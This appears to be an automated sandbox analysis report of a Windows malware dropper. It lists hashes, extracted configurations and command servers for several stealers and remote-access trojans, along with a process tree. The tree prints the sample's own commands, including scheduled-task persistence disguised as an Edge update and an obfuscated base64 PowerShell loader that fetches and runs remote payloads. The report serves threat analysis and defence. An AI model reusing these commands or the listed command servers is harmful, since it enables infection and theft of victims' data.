Overview

overview

10

Static

static

3

f6b00751dd...40.exe

windows7-x64

10

f6b00751dd...40.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2025 16:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe

  • Size

    1.8MB

  • MD5

    79313fd19b4d3a947a4a5bb6d8a3e719

  • SHA1

    f89d8fd59723ca8e433fd10a69c12f1da208d69d

  • SHA256

    f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40

  • SHA512

    35cdfe95ca8c7a8e51a636dcd1fdad96d319b933171d75df30dd52ff3f1b8720d6e1bacf6ca4352a7310b1711d111fe2da322e7a3a85f33fcaa42e8c79a62142

  • SSDEEP

    49152:IonQDVTFz3+dBKJCLKwVP9fcaGrGZ2nePhUC/SdcY6NSesH:/Q9tjJCGwVF0aGCZ2enty

Score
10/10
amadeyasyncratgurcuhealerlummanetsupportstealcstormkittyvidarxworm9c9aa5bratdefaultdefense_evasiondiscoverydropperevasionexecutionpersistenceratstealerthemidatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

91.212.166.99:4404

Mutex

f35pmRFzPiiasEf1

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    dllhost.exe

aes.plain

Extracted

Family

vidar

C2

https://t.me/sc1phell

https://steamcommunity.com/profiles/76561199819539662
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

159.100.19.137:7707

Mutex

yBu0GW2G5zAc

Attributes
  • delay

    3

  • install

    false

  • install_file

    svchost.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

Extracted

Family

stealc

Botnet

brat

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://toppyneedus.biz/api

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7796466207:AAFr4eJop5lV1qGyhuFlMc4hIV2ErcSZ_4E/sendMessag

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect Vidar Stealer 3 IoCs
    stealer
  • Detect Xworm Payload 1 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Gurcu family
    gurcu
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

    stealergurcu
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

    ratnetsupport
  • Netsupport family
    netsupport
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
    defense_evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
    defense_evasion
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 19 IoCs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 33 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 12 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    defense_evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe
    "C:\Users\Admin\AppData\Local\Temp\f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3004
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:980
      • C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe
        "C:\Users\Admin\AppData\Local\Temp\1034761001\13Z5sqy.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4264
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3788
      • C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe
        "C:\Users\Admin\AppData\Local\Temp\1039270001\jonbDes.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2776
      • C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe
        "C:\Users\Admin\AppData\Local\Temp\1043273001\fok8xWd.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1160
      • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe
        "C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3732
        • C:\Users\Admin\AppData\Local\Temp\is-MT01V.tmp\IJWSn6z.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-MT01V.tmp\IJWSn6z.tmp" /SL5="$A0230,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4976
          • C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe
            "C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2732
            • C:\Users\Admin\AppData\Local\Temp\is-EF9JU.tmp\IJWSn6z.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-EF9JU.tmp\IJWSn6z.tmp" /SL5="$E0050,1104885,161792,C:\Users\Admin\AppData\Local\Temp\1050642001\IJWSn6z.exe" /VERYSILENT
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:672
              • C:\Windows\SysWOW64\regsvr32.exe
                "regsvr32.exe" /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:844
                • C:\Windows\system32\regsvr32.exe
                  /s /i:SYNC "C:\Users\Admin\AppData\Roaming\\uxtheme_2.drv"
                  8⤵
                  • Loads dropped DLL
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:948
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3512
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\Admin\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{FA7BC360-7A5D-4EC8-F7C4-050988450400}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1480
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dllhost" /tr "C:\Users\Admin\AppData\Local\dllhost.exe"
                    9⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4552
      • C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe
        "C:\Users\Admin\AppData\Local\Temp\1051675001\mH0mZDF.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:2276
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4016
      • C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe
        "C:\Users\Admin\AppData\Local\Temp\1051791001\tYrnx75.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4236
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1504
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            PID:4216
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "opssvc wrsa"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4728
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            • System Location Discovery: System Language Discovery
            PID:316
          • C:\Windows\SysWOW64\findstr.exe
            findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            5⤵
              PID:1916
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c md 764661
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3748
            • C:\Windows\SysWOW64\extrac32.exe
              extrac32 /Y /E Fm
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4332
            • C:\Windows\SysWOW64\findstr.exe
              findstr /V "Tunnel" Addresses
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4564
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2592
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1820
            • C:\Users\Admin\AppData\Local\Temp\764661\Macromedia.com
              Macromedia.com F
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2560
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1192
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3512
            • C:\Windows\SysWOW64\choice.exe
              choice /d y /t 15
              5⤵
              • System Location Discovery: System Language Discovery
              PID:316
        • C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe
          "C:\Users\Admin\AppData\Local\Temp\1051928001\UmN1TJS.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:3744
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c 67938ad15f2a9.vbs
            4⤵
            • Checks computer location settings
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:4796
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67938ad15f2a9.vbs"
              5⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3988
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@B0@H@@Og@v@C8@dQBw@HQ@bwBk@GE@d@Bl@HM@eQBz@HQ@ZQBt@C4@YwBv@G0@LwB0@GU@cwB0@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@Gk@awBm@Gs@a@BT@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1256
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
